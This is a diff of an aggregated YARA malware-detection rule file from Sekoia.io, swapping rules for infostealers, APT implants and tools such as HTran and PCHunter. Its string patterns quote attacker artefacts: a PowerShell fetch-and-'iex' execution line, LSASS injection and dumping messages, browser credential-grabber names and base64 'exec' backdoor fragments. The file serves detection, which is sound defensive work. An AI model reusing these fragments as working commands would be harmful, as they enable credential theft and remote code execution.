-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_yemen_apk_guardzoo.yar#L1-L40"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_ducklogs.yar#L1-L30"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "3afad114c68489e2d294720339baf570"
-		hash = "c59d0f5c8d00485199f147b96c5abca0"
-		hash = "75c58948725133160085dc1cfdf602ec"
-		hash = "d76a39ee85263900f7e6eaacb804f5e2"
-		hash = "51356c95dfe1221c0f4ca2475bc787f8"
-		hash = "1d0dd8201c051d9c8d2c945c8b31a48c"
-		hash = "b7b6be5e8eec44dd13e1df1f3908fcf0"
-		hash = "229984f004578a8fa643afb881d81e8c"
-		hash = "f3f1ccb3912c49a0a6ea710a0bd856de"
-		hash = "a3f8365bfa5f8185e8c7eba8efc63165"
-		hash = "7392deaf81ddf50b8a6f2179538f7e81"
-		hash = "c40d56e1586f9fa382c688d624d25525"
-		hash = "629fb04b91c4db4ea282440e20317dab"
-		hash = "bcebc41628196f8bd119f72e1e8eb47c"
-		hash = "f1cfdc9e91c3a20563246cf366b94f10"
-		hash = "a75ffb11adbace40a7c59128adba43ad"
-		logic_hash = "7d98aefa4c2ee7316e0ff47a67d9f19913852d1a451ef38ccb77709394e4ba73"
+		logic_hash = "5db1a5595ec41488da620606bbcb36d0d686f9d6b7a0479439c53625df0886a0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239380,91 +239282,88 @@ rule SEKOIA_Apt_Yemen_Apk_Guardzoo : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$classes_1 = "GuardZoo.java"
-		$classes_2 = "com/animals"
-		$path_1 = "&Password="
-		$path_2 = "&Coordinates="
-		$path_3 = "&Data="
-		$path_4 = "&Device="
-		$path_5 = "&ISPICTURE="
-		$path_6 = "&Phone_Number="
-		$path_7 = "&Provider="
+		$dck = "DuckLogs" ascii wide
+		$str01 = "CheckRemoteDebuggerPresent" ascii
+		$str02 = "MozGlueNotFound" ascii
+		$str03 = "get_DecryptedPassword" ascii
+		$str04 = "get_Extension" ascii
+		$str05 = "set_UseShellExecute" ascii
+		$str06 = "FirefoxPasswords" ascii
+		$str07 = "GetAllGeckoCookies" ascii
+		$str08 = "GetAllBlinkDownloadsBy" ascii
+		$str09 = "Grabbers" ascii
+		$str10 = "Utility" ascii
+		$str11 = "Persistance" ascii
+		$str12 = "Clipboard" ascii
+		$str13 = "WaterfoxGrabber" ascii
+		$str14 = "AvastGrabber" ascii
 
 	condition:
-		uint32be( 0 ) == 0x6465780a and filesize < 10MB and ( ( any of ( $classes_* ) ) and ( 3 of ( $path_* ) ) )
+		uint16( 0 ) == 0x5A4D and ( ( #dck > 4 and 2 of ( $str* ) ) or 12 of them )
 }
-rule SEKOIA_Infostealer_Win_Mars_Stealer_Xor_Routine : FILE
+
+rule SEKOIA_Tool_Pchunter_And_Related_Certificate : FILE
 {
 	meta:
-		description = "Detect Mars Stealer based on a specific XOR routine"
+		description = "Detects PCHunter and associated binairies & drivers"
 		author = "Sekoia.io"
-		id = "3e2c7440b2fc9e4b039e6fa8152ac8ff"
-		date = "2022-04-06"
+		id = "757c7738-4ee8-4b4e-bdda-0c5b0c010f40"
+		date = "2022-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_mars_stealer_xor_routine.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_pchunter_and_related_certificate.yar#L3-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c7e65550a225431552e8a81bbce81dd66350021b6444c94fe7a37aa96712e9b1"
+		logic_hash = "924a85b2eaec73b628e705b3bb2e464582a71c19317d2023b1422b1b8ad97a51"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$xor = {8b 4d ?? 03 4d ?? 0f be 19 8b 55 ?? 52 e8 ?? ?? ?? ?? 83 c4 ?? 8b c8 8b 45 ?? 33 d2 f7 f1 8b 45 ?? 0f be 0c 10 33 d9 8b 55 ?? 03 55 ?? 88 1a eb be}
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $xor
+		uint16be( 0 ) == 0x4d5a and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial contains "05:51:bc:8c:6a:a2:ca:03:2b:c6:71:38:30:d8:49:a3" ) and filesize > 400KB and filesize < 20MB
 }
-rule SEKOIA_Vpn_Mul_Softether
+rule SEKOIA_Tool_Advancedrun_Strings : FILE
 {
 	meta:
-		description = "Detect the open-source SoftEther VPN"
+		description = "Detects AdvancedRun strings"
 		author = "Sekoia.io"
-		id = "a1fbf4fe-b934-4a66-b6b1-ebe2f83505cd"
-		date = "2024-04-15"
+		id = "842a996e-0cf2-485f-9d3c-ccbd40c9ab6c"
+		date = "2024-09-06"
 		modified = "2024-12-19"
-		reference = "https://www.softether.org/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/vpn_mul_softether.yar#L1-L29"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_advancedrun_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f93e838631518590e518f29557c60a40734da30b62c056f8ebb8febed389551b"
+		hash = "a1d50ebe6124584f32de0625475cdb74"
+		logic_hash = "58e5e0c903057ff382a78a37ba289cbaa5949d99a4b5ff77a223e86aab591f5d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\softether_se%s"
-		$ = "GET /vgc_download_dat/ HTTP/1.1"
-		$ = "http://x%c.x%c.client.api.vpngate2.jp/api/"
-		$ = "http://x0.x0.client.api.vpngate2.jp/check/check.txt"
-		$ = "https://x%c.x%c.statistics.api.vpngate2.jp/api/statistics/"
-		$ = "Software\\SoftEther Project\\SoftEther VPN\\"
-		$ = "|vpnsetup_nosign.exe" wide
-		$ = "/ISEASYINSTALLER:%u" wide
-		$ = "/CALLERSFXPATH:\"%s\"" wide
-		$ = "vpn_client.config" wide
-		$ = "vpn_bridge.config" wide
-		$ = "|backup_dir_readme.txt" wide
-		$ = "vpn_debuginfo_%04u%02u%02u_%02u%02u%02u.zip" wide
+		$ = "nirsoft.net" wide
+		$ = "Another logged-in user" wide
+		$ = "Choose config file to save" wide
+		$ = "AdvancedRun" ascii wide
 
 	condition:
-		8 of them
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 1MB
 }
-rule SEKOIA_Tool_Multidump_Strings : FILE
+rule SEKOIA_Apt_Muddywater_Muddyc2Go_Dll_Launcher_Strings : FILE
 {
 	meta:
-		description = "Detects MultiDump"
+		description = "Detects MuddyC2Go DLL launcher"
 		author = "Sekoia.io"
-		id = "4897c898-01dd-40d2-bf28-266231c88f8a"
-		date = "2024-03-19"
+		id = "59756195-d842-4038-8fbf-43d26f4353bc"
+		date = "2024-03-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_multidump_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_muddyc2go_dll_launcher_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8d98cf89d56f5a949023364f94c8d55f8875408b082fb52e118f99d46533124d"
+		hash = "1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca"
+		logic_hash = "b91653e313258ebd2073a398d0467800056ac94adab02c3a83aa8a379710e4e6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239472,28 +239371,29 @@ rule SEKOIA_Tool_Multidump_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "--nodump\tDisable LSASS dumping"
-		$ = "-r 192.168.1.100:5000"
-		$ = "Path to save procdump.exe"
-		$ = "[!] CreateFileW [R] Failed With Error"
-		$ = "LSASS is Running, Continuin"
-		$ = "Dumping LSASS Using ProcDump"
+		$ = "-Method GET -ErrorAction Stop;Write-Output $response.Content;iex $response.Content;"
+		$ = "GetCurrentProcess"
+		$ = "TerminateProcess"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 50KB and all of them
 }
-rule SEKOIA_Apt_Oilrig_Sc5Kv3_Strings : FILE
+rule SEKOIA_Tool_Execit_Obfuscator_Strings : FILE
 {
 	meta:
-		description = "Detects SC5kv3 malware based on strings"
+		description = "Detects ExecIT Dlls"
 		author = "Sekoia.io"
-		id = "885ea13b-47b0-4a6d-8136-9b31abc9064a"
-		date = "2023-12-20"
+		id = "59eaeb20-150b-41a4-b866-1c91a07623ac"
+		date = "2024-09-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_sc5kv3_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_execit_obfuscator_strings.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ace8e227abd97d0ec21815cc58c24d46e4944f2b0e1987672be53f81356a7a57"
+		hash = "1c185e2e11d8eadccfb130766ca30d85"
+		hash = "a0898f57f2b139ea278d8a7e97bbe358"
+		hash = "e0e12a8891f5585ce1ad55dbffb4f9c2"
+		hash = "d4102676d536bacffcf6c94364e26828"
+		logic_hash = "cd8edbe9c6cb7dcde56860e0ff47f4496b36848f46a89f6945b7762f86ff5e59"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239501,24 +239401,32 @@ rule SEKOIA_Apt_Oilrig_Sc5Kv3_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "no-reply this email!" ascii wide
-		$ = "The serial is " ascii wide
+		$ = "yromeMlautriVetacollAtN"
+		$ = "xEdaerhTetaerCtN"
+		$ = "tcejbOelgniSroFtiaWtN"
+		$ = "lld.esablenrek"
+		$ = "txetnoCdaerhTteG"
+		$ = "txetnoCdaerhTteS"
+		$ = "cef_api_hash"
+		$ = "cef_execute_process"
+		$ = "cef_get_path"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
+		uint16be( 0 ) == 0x4d5a and 5 of them
 }
-rule SEKOIA_Malware_Win_Passlib : FILE
+rule SEKOIA_Apt_Sidecopy_Cheex : FILE
 {
 	meta:
-		description = "Detect the Passlib malware"
+		description = "Detects PDB path of Cheex"
 		author = "Sekoia.io"
-		id = "609999e2-a644-4bf3-bce2-b0e1b0e7094b"
-		date = "2022-07-28"
+		id = "e9b57f15-e703-4367-b501-fa8a873e4455"
+		date = "2024-08-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_win_passlib.yar#L1-L32"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sidecopy_cheex.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5e76f7c40a00182ee076720b4c19a45e82a8ce11740fdd8e9419f9d9e93cdb41"
+		hash = "825c7a1603f800ff247c8f3e9a1420af"
+		logic_hash = "e5561466b616c746b33c0c4a46e8bdb0859e55aef8896bc1b14e54838c1661ee"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239526,64 +239434,57 @@ rule SEKOIA_Malware_Win_Passlib : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Passlib test utility - Version %s" wide
-		$ = "-l <full_path_to_dll_to_load_into_lsass> (arbitrary dll injection into LSASS)" wide
-		$ = "-u <dll_to_unload_from_lsass> (arbitrary dll uninjection from LSASS)" wide
-		$ = "DLL %s injection was successful requested!" wide
-		$ = "DLL %s uninjection was successful requested!" wide
-		$ = "Process %s was succesfully created with full privileges and system integrity!" wide
-		$ = "full_path_to_volatile_payload_dll" wide
-		$ = "%s: [%s]:[%s] (http_only:%d)" wide
-		$ = "LEX server has been deployed at lsass." wide
-		$ = "LEX client is using volatile payload at: %s" wide
-		$ = "LEX client is using permanent payload at: %s" wide
-		$ = "Passlib execution finished" wide
-		$ = "Running on Passlib version %ws" wide
-		$ = "There was a problem initializing passlib manager interface." wide
-		$ = "Passlib running without high integrity" wide
-		$ = "About to dump passwords through passlib manager interface" wide
+		$ = "C:\\Users\\Dead Snake\\source\\repos\\cheex" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 1500KB and all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-
-rule SEKOIA_Typhon_Reborn_Stealer
+rule SEKOIA_Infostealer_Win_Titan : FILE
 {
 	meta:
-		description = "Typhon Reborn v2 string based detection"
+		description = "Finds samples of the Titan Stealer"
 		author = "Sekoia.io"
-		id = "aab7279b-b651-4092-b988-d186d0a433de"
-		date = "2023-05-15"
+		id = "0adbe616-0d91-4b05-b7a8-812cd79f9252"
+		date = "2023-01-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/typhon_reborn_stealer.yar#L3-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_titan.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0db77a2e1d6b7274b0256fe469b72953c1b8598cbfc1715a43e5fbfa7899fe4c"
+		logic_hash = "996dc320c83f57c47afe50ad032bac43ad1fbfbbd5a86e517089a062b0382993"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "api.telegram.org/bot" wide
-		$s2 = "TyphonReborn Stealer v2 log!" wide
+		$str0 = "/sendlog" ascii
+		$str1 = "/stealer/grabfiles.go" ascii
+		$str2 = "/stealer/installedsoft.go" ascii
+		$str3 = "/stealer/screenshot.go" ascii
+		$str4 = "/stealer/sendlog.go" ascii
+		$str5 = "/stealer/userinformation.go" ascii
+		$str6 = "C:/Program Files (x86)/Steam/config/" ascii
+		$str7 = "/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/" ascii
+		$str8 = "MAC Adresses:" ascii
+		$str9 = "/Coowon/Coowon/" ascii
+		$str10 = "_/C_/Users/admin/Desktop/stealer_v7/stealer" ascii
 
 	condition:
-		all of them and pe.is_pe
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule SEKOIA_Malware_Venom_Agent_Strings : FILE
+rule SEKOIA_Apt_Oilrig_Odagent_Strings : FILE
 {
 	meta:
-		description = "Detects Venom agent strings"
+		description = "Detects ODAgent malware based on strings"
 		author = "Sekoia.io"
-		id = "87633510-8b39-4eb1-b95b-4ebff21f3bba"
-		date = "2022-08-29"
+		id = "1c5c0eb5-7c6f-4a34-b2e2-4a7c6d7030d6"
+		date = "2023-12-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_venom_agent_strings.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_odagent_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "66dd1cb7bd66fcf78c8eaad8aaab7cfd624b898b7b479e571bacf5c4e48edac9"
+		logic_hash = "14a1399ff3519632e3bbb6eea0d44e9908cfc03728bd26f610ab75fff6a8d2c6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239591,39 +239492,27 @@ rule SEKOIA_Malware_Venom_Agent_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "dispather.handleDownloadCmd"
-		$ = "dispather.handleUploadCmd"
-		$ = "dispather.handleShellCmd"
-		$ = "dispather.handleSocks5Cmd"
-		$ = "dispather.handleLForwardCmd"
-		$ = "dispather.localLForwardServer"
-		$ = "dispather.handleRForwardCmd"
-		$ = "dispather.AgentHandShake"
-		$ = "dispather.AgentParseTarget"
-		$ = "dispather.PipeWhenClose"
-		$ = "dispather.handleSshConnectCmd"
-		$ = "node.(*NetworkTopology).InitNetworkMap"
-		$ = "node.CopyNet2Node"
-		$ = "node.(*Node).CommandHandler.func1"
-		$ = "node.(*Buffer).WriteLowLevelPacket"
-		$ = "protocol.(*Packet).ResolveDat"
-		$ = "netio.InitTCP.func2"
+		$ = "application/x-www-form-urlencoded" ascii wide
+		$ = "dly>" ascii wide
+		$ = "DELETE" ascii wide
+		$ = "nok!" ascii wide
+		$ = ".c:/content" ascii wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 10MB and 6 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
 }
-rule SEKOIA_Apt_Ta428_Tmanger_Strings : FILE
+rule SEKOIA_Tool_Htran_Strings : FILE
 {
 	meta:
-		description = "Detects Tmanger malware"
+		description = "Detects HTran based on strings"
 		author = "Sekoia.io"
-		id = "f600404d-3f93-4e3f-bba7-9f519f67c6cb"
-		date = "2022-09-06"
+		id = "0184937e-eefa-4c6d-ae00-9b0af80dc7db"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ta428_tmanger_strings.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_htran_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e045f38367fa7f3cdcc908e60de4386889c7878c95b1a40f63fd70683699b0f1"
+		logic_hash = "6a414cec8ad623c735779b9005074f88b07d88b29b23918d98a541a2612a3fa0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239631,19 +239520,15 @@ rule SEKOIA_Apt_Ta428_Tmanger_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "sock_hmutex" wide ascii
-		$ = "cmd_hmutex" wide ascii
-		$ = "%s_%d.bmp" wide ascii
-		$ = "WSAStartup Error!" wide ascii
-		$ = "4551-8f84-08e738aec" wide ascii
-		$ = "Init failed!" wide ascii
-		$ = "GetLanIP error!" wide ascii
-		$ = "chcp & exit" wide ascii
-		$ = "GetHostname error!" wide ascii
-		$ = "[Num Lock]" wide ascii
+		$ = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>"
+		$ = "-tran <ConnectPort> <TransmitHost> <TransmitPort>"
+		$ = "-listen <ConnectPort> <TransmitPort>"
+		$ = "[-] There is a error...Create a new connection."
+		$ = "[+] Start Transmit (%s:%d <-> %s:%d) ......"
+		$ = "[+] Accept a Client on port %d from %s"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 4 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
 }
 
 rule SEKOIA_Apt_Nobelium_Nativezone_Gen : FILE
@@ -239670,47 +239555,21 @@ rule SEKOIA_Apt_Nobelium_Nativezone_Gen : FILE
 		$nobs = { C7 85 [6] 00 00 C7 85 }
 
 	condition:
-		pe.DLL and filesize < 2500KB and pe.number_of_exports > 20 and pe.number_of_imports < 30 and ( pe.imports ( "kernel32.dll" , "VirtualAlloc" ) and pe.imports ( "kernel32.dll" , "VirtualProtect" ) ) and for any i in ( 0 .. pe.number_of_sections - 1 ) : ( pe.sections [ i ] . name == ".rdata" and pe.sections [ i ] . raw_data_size > 300000 ) and #obs > 300 and #nobs < 150 and not $rich
-}
-rule SEKOIA_Implant_Mac_Smoothoperator_Update_Agent : FILE
-{
-	meta:
-		description = "UpdateAgent payload delivered by SmoothOperator during the 3CX supply chain attack"
-		author = "Sekoia.io"
-		id = "45a1d0d9-083b-4b4a-b53c-e5d86f804f01"
-		date = "2023-07-04"
-		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_mac_smoothoperator_update_agent.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d5a0d87ac810097983df92ab1b1ff9775093b0aaaf551a74ff6fe5149dbd3a21"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		version = "1.0"
-		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "3CX Desktop App/.main_storage"
-		$ = "3CX Desktop App/config.json"
-		$ = "3cx_auth_token_content=%s"
-		$ = "3cx_auth_id=%s"
-
-	condition:
-		uint32be( 0 ) == 0xcffaedfe and 2 of them
+		pe.DLL and filesize < 2500KB and pe.number_of_exports > 20 and pe.number_of_imports < 30 and ( pe.imports ( "kernel32.dll" , "VirtualAlloc" ) and pe.imports ( "kernel32.dll" , "VirtualProtect" ) ) and for any i in ( 0 .. pe.number_of_sections - 1 ) : ( pe.sections [ i ] . name == ".rdata" and pe.sections [ i ] . raw_data_size > 300000 ) and #obs > 300 and #nobs < 150 and not $rich
 }
-rule SEKOIA_Apt_Micdown_Encrypted_Configuration : FILE
+
+rule SEKOIA_Tool_Impersonate_Strings : FILE
 {
 	meta:
-		description = "Encrypted C2 configuration of micDown"
+		description = "Detects Impersonate"
 		author = "Sekoia.io"
-		id = "9567d68b-05d1-4d41-b87f-c8691ee689cd"
-		date = "2023-08-24"
+		id = "2ab345a2-9366-4673-b398-a59ba6954af5"
+		date = "2024-07-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_micdown_encrypted_configuration.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_impersonate_strings.yar#L3-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9b80bd284f9aa9e4073bdead7bb0c5412ec1809c36a85dfd35d9ea7ac62da8a3"
+		logic_hash = "63c46a2d97d0a8360351b8906665186c5ad2dcaa6f2edba6da7bf4de2ce00241"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239718,23 +239577,31 @@ rule SEKOIA_Apt_Micdown_Encrypted_Configuration : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {?? [20] 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 84 36}
+		$ = "[*] Listing available tokens"
+		$ = "[ID: %2d][SESSION: %d][INTEGRITY: %-6ws][%-18ws][%-22ws] User: %ws"
+		$ = "[*] Impersonating %ws"
+		$ = "[!] Impersonation failed error: %d"
+		$ = "[*] Adding user %ls on %ls"
+		$ = "[!] Add user failed with error: %d"
+		$ = "[*] Adding user %ws to domain group %ws"
+		$ = "[!] Add user in domain %ws failed with error: %d"
+		$ = "[!] Couldn't change token session id (error: %d)"
 
 	condition:
-		filesize == 66 and all of them
+		uint16be( 0 ) == 0x4d5a and 3 of them or pe.imphash ( ) == "e14ce763114276674e22b7b8b637bd4b"
 }
-rule SEKOIA_Apt_Uta0218_Upstyle_Backdoor_Strings : FILE
+rule SEKOIA_Apt_Kimsuky_Powershell_Dropper_Strings : FILE
 {
 	meta:
-		description = "Detects UPSTYLE backdoor"
+		description = "Detects a PowerShell dropper used by Kimsuky"
 		author = "Sekoia.io"
-		id = "098fbad7-efaf-4198-83de-208c2ae16f89"
-		date = "2024-04-16"
+		id = "8b346e05-215b-46c0-82bf-fce3a65440f3"
+		date = "2024-06-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uta0218_upstyle_backdoor_strings.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_powershell_dropper_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bcba657b0b302f4b46f09bc4b815a581d22208b5d9f99e1233878f775241f92e"
+		logic_hash = "e98f23ddf02049126786e9300e7b6661b2a74817b36e2f3a661b07b24ef4402d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239742,17 +239609,13 @@ rule SEKOIA_Apt_Uta0218_Upstyle_Backdoor_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1_1 = "f.write(b'''import base64;exec(base64.b64decode(b" ascii
-		$s1_2 = "atime=os.path.getatime(" ascii
-		$s2_1 = "exec(base64.b64decode(functioncode))" ascii base64
-		$s2_2 = "os.path.exists(systempth):" ascii base64
-		$s2_3 = ".read().replace(b\"\\x00\",b\" \")" ascii base64
-		$s3_1 = "if WRITE_FLAG:" ascii base64
-		$s3_2 = "re.search(SHELL_PATTERN" ascii base64
-		$s3_3 = "import threading,time,os,re,base64" ascii base64
+		$s1 = "try { " ascii wide
+		$s2 = "); } catch(e){} } if ("
+		$s3 = "WScript.Sleep("
+		$s4 = " } catch(e) { }"
 
 	condition:
-		filesize < 1500 and ( 2 of ( $s1_* ) or 2 of ( $s2_* ) or 2 of ( $s3_* ) )
+		filesize > 500KB and $s1 at 0 and $s2 in ( filesize -1000 .. filesize ) and $s3 in ( filesize -1000 .. filesize ) and $s4 in ( filesize -1000 .. filesize )
 }
 rule SEKOIA_Apt_Spynote_Android_Dex_Strings : FILE
 {
@@ -239781,73 +239644,76 @@ rule SEKOIA_Apt_Spynote_Android_Dex_Strings : FILE
 	condition:
 		uint32be( 0 ) == 0x6465780A and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Lazarus_Backdoored_Jslib : FILE
+
+rule SEKOIA_Backdoor_Win_Winordll64
 {
 	meta:
-		description = "Detects InvisibleFerret based on common ressource."
+		description = "Detect the WinorDLL64 backdoor"
 		author = "Sekoia.io"
-		id = "73ffd449-93c8-494e-9c14-2e933b21a200"
-		date = "2024-10-28"
+		id = "86a32538-bc69-47ea-9842-4af360588c27"
+		date = "2023-02-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_backdoored_jslib.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_winordll64.yar#L4-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "52e92be527690f4e63608cbc699e2f70"
-		logic_hash = "205ad321afcb22ae2bf6cf2a58ce970ea9b0edda7fab60ddeda5ea36ecfe3cb9"
+		logic_hash = "30e6f01f30d6ef11c75e133d309cebc87b69ede8eb38aa14d237760e99b52c54"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$obf = "(function(_0x" ascii
-		$exp = "module.exports =" ascii
-
 	condition:
-		$exp in ( filesize -500 .. filesize ) and #obf == 1
